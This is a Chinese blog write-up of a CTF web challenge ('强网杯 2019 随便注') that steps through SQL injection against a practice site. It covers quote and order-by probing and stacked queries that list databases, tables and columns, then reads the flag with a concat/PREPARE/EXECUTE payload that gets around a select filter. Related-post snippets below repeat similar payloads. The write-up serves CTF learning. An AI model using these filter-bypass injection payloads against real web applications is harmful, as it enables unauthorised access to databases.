BMZCTF 强网杯 2019 随便注

最新推荐文章于 2022-04-02 20:24:06 发布
最新推荐文章于 2022-04-02 20:24:06 发布
阅读量340 收藏 4
点赞数
分类专栏: BMZCTF刷题记录 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26243045/article/details/110297926
版权

考点:sql注入、二次注入

打开网页,是一个输入框:

输入1,并提交:

看到返回数组,测试是否存在注入点:输入1‘

返回报错。

输入1‘ #

返回正常

尝试手工注入:

1、输入1‘ order by *,测试能返回几列,多次尝试,*处为2,即:1’ order by 2能返回正常。

再试着输入select测试返回点:1’ union select 1,2 #

看到好多字符被过滤。尝试sqlmap 只能爆出库名为supersqli

尝试堆叠注入

输入:1’; show databases; #

看到了返回的库名

再看看表名有哪些:1’;show tables; #

看到有两张表:分别为flagg和words

分别看看都有哪些列:1’;show columns from flagg #

看到了我们想要flag列。下面就是想如何读取里面的内容了。

Select 被过滤,无法正常查询。只能拼接查询语句:

-1';use supersqli;set @sql=concat('s','elect `flag` from `flagg`');PREPARE BMZ FROM @sql;EXECUTE BMZ;#

得到flag。

白帽子社区
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2020祥云杯 CTFNu1L.pdf
03-15
2020祥云杯 CTF WP 高清PDF版
BMZCTF内存取证三项.zip
10-21
BMZCTF内存取证三项.zip》是一个与网络安全和取证相关的压缩文件,包含了一次可能的CTF(Capture The Flag)挑战。从标题和描述中,我们可以推测这是一场涉及解密、密码学以及文件分析的竞赛。接下来,我们将深入...
bmzctf_强网杯 2019 随便
Kobalos的博客
09-24 124
直接访问目标地址,看到输入框,尝试任意输入 输入1’ 输入1’ #返回正常,确认存在入 输入1’ order by 2 # 返回正常 输入1’ order by 3 # 返回报错 再试着输入select测试返回点:1’ union select 1,2 #,发现select被过滤 尝试堆叠入:1’;show databases; # 输入 1’;show tables; # 输入 1’;show columns from flagg# 输入 -1’;use supersqli;set
BMZCTF 强网杯 2019 随便 原理+题解
AAAAAAAAAAAA66的博客
12-20 754
目录 知识点 堆叠入 show语句 mysql预编译 过程 重点 预编译 重命名 总结 知识点 堆叠入 堆叠查询入:堆叠查询可以执行多条SQL语句,语句之间以分号(;)隔开。而堆叠查询入攻击就是利用此特点,在第二条语句中构造自己要执行的语句。 比如: (这样一下就会执行2条命令,与union入有相似的地方,union入可以在一条语句中执行多个操作,而堆叠入可以在一次输入中执行多条语句) ?id=1 ;show database; ...
BMZCTF——web(hctf、随便、ezeval)
LizePing_的博客
07-06 385
BMZCTF——webhctf_2018_warmup做题思路强网杯 2019 随便做题思路三级目录 hctf_2018_warmup 做题思路 打开题目链接,F12查看元素,看到释有source.php,访问看看 访问目录得到一个php代码,不妨看一看他要表达什么。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page)
buuctf-web-[强网杯 2019]随便
weixin_46079186的博客
06-30 151
1.打开网站输入框输入1’ 报错 2. 最后判断 列数是2 3. 输入select 相关立马出现提示,过滤一些关键参数 使用报错入,可以不用输入select 查看当前数据库,但是过滤关键参数,只能查询一些 1’ and extractvalue(null,concat(0x7e,database(),0x7e));# 使用堆叠入 1’;show databases;# 查看所有表 1’;show tables;# 查看表字段 1’;show columns from `1919
BMZCTF:赢战2019
末初的CSDN博客
12-14 496
http://bmzclub.cn/challenges#%E8%B5%A2%E6%88%982019 题目描述 2019年的第一场月赛,zhu定了是一场zhu福满天飞的比赛~答案提交flag{}括号内的值。 zhu.jpg 使用stegslove打开这张二维码 flag{You_ARE_Sosmart}
ctf逆向解题——re1-附件资源
03-02
ctf逆向解题——re1-附件资源
androidpn 消息推送 服务器端源码
08-10
《AndroidPN:构建高效的消息推送服务器》 在移动应用开发中,实时消息推送是一项至关重要的功能,它使得应用能够及时地向用户发送通知,提升用户体验。AndroidPN(Android Push Notification)是一个专门针对...
buuctf-随便
xixihahawuwu的博客
11-23 274
上没有什么提示,进入环境 有一个提交查询,点击查询,数字为1时回显如下 数字为2回显如下,且文本框内数字自动变为1 当数字大于2时,页面不会返回内容。说明字段数为2 看下源码 咳咳,这就过分了哈.我偏要用 先试下’ 再select下 回显了关键字的过滤,union入没法用 这里有一个知识点就是“堆积入” 其实就是加了;之后接着入 1’;show databases;爆下数据库 再爆个表 好啊。尝试下把表内容爆出来 1’;show columns from words; 没啥有用的 下一个,这
buuctf 2019强网杯 随便
devilare的博客
09-26 333
2019强网杯 随便 来到页面发现只是一个提交栏 随意试一下输入1’有回显说明存在sql入,输入万能密码试试1’ or 1=1;#输入1’; union select;#看看能否联合查询一下存在过滤,且没办法通过大小写绕过,好难,看看wp。看来需要堆叠入(ps:堆叠入就是一次性执行多条查询语句) 输入1’;show databases;#查看所有的数据库;en。。。没有和flag有关的字样,再输入1’;show tables;#看看表 ...
BMZ-MISC-赢战2019
qq_24033605的博客
04-20 142
BMZ-MISC-赢战2019 一张图片和一个题目描述(描述了个寂寞) 两个点引起了我的关,一个是文件大小,一个是主题,我以为是道签到题,就先把第二个试了试,结果啥也不是,那就再试一试文件包含。 分解出一张二维码,扫一扫 stegsolve分析一下,原来又是颜色被调整了 ...
BMZCTF-Web WriteUp
Crazy198410的博客
11-15 1350
Web 题 hctf_2018_warmup 打开后是一张图片。 查看源码发现source.php 访问,得到一串代码: <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUUCTF:[强网杯 2019]Upload
末初的CSDN博客
03-27 3237
参考:https://www.zhaoj.in/read-5873.html 稍微测试了一下,不存在入或者万能密码登录,先册登录 先传一句话木马图片上去看看 上传的是一张jpg的图片,传上去之后被改后缀为png,而且可以看到路径和文件名都进行了重命名使用md5值 目录扫描出一个www.tar.gz在网站根目录,使用phpstorm打开,发现是ThinkPHP5框架 而且存在....
BMZCTF 4进制
qq_26243045的博客
12-03 430
下载附件,为一个文本文件,打开后,是一串数字: `1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1303 1211 301 302 303 1331` 根据题目可知是4进制。我们要转为十进制,再查ASCII表。以第一个数字为例: 1212=1*43+2*42+1*41+2*40=102,查表为f 编写程序: ``` s='1212 1230 1201 1213 1323 1012 1233 1311 1302 1202 1201 1
SQL Injection8(堆叠入)——强网杯2019随便
kid的博客
05-28 1万+
SQL Injection8(堆叠入)——强网杯2019随便 前言 前面参加强网杯线上赛,亲身体验了一把ctf从入门到入土,从打ctf变成被ctf打… 这里结合里面的题来对里面的知识点进行一个学习总结 随便是一道sql入题,因为过滤规则十分强大,所以很难… 这里会用到堆叠入的知识,堆叠入前面有所了解,觉得并不难,所以也没练习过,但做这道题的时候就又些懵了。 堆叠入原理 在SQL中,...
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习
break_cat的博客
11-17 1705
抛砖引玉 BMZCTF渗透测试公开赛WP复现学习 背景:上周末参加了BMZCTF的渗透测试公开赛,比赛是解BMZCTF靶场中综合渗透的一道题,比赛后官方发了WP,跟着做了一遍,出现了一些问题,写出来抛砖引玉,求指导。 思路:1.官方预期解法(这……我做出来的和解法效果不一样,求大佬指点)            2.非预期解法——广州航海学院 HhhM(成功,感谢HhhM大佬的思路,学习了) &nb
BMZCTF misc1
qq_61768489的博客
04-02 1959
真正的CTFer 010修改图片高度,steg查看更清晰 解不开的秘密 word加密 文件给了16密文 ,转ASCII后继续转base64, 得到数据 [HKEY_CURRENT_USER\Software\RealVNC\VNCViewer4\MRU] "00"="127.0.0.1" "Order"=hex:00,01 "01"="127.0.0.1:5900" [HKEY_CURRENT_USER\Software\RealVNC\WinVNC4] "Password"=hex:
buuctf [强网杯 2019]随便 1
weixin_45642610的博客
01-07 1万+
buuctf web [强网杯 2019]随便 1 -刷题个人日记 小白一个,写给自己看。 打开后是这样。 从题目和内容来看就是一道sql入题。 输入 1' or 1=1;# 这个#用来释掉后面的sql语句 显示所有数据,这个数据有什么用我也不知道,但sql入一般第一步就是这样看看有没有有用的信息(没有)。 输入 1' order by 2;# 1' order by 3;# 到第3列报错,说明只显示两列。 输入1'; show tables;# 可以看到有 191981093

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽子社区

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值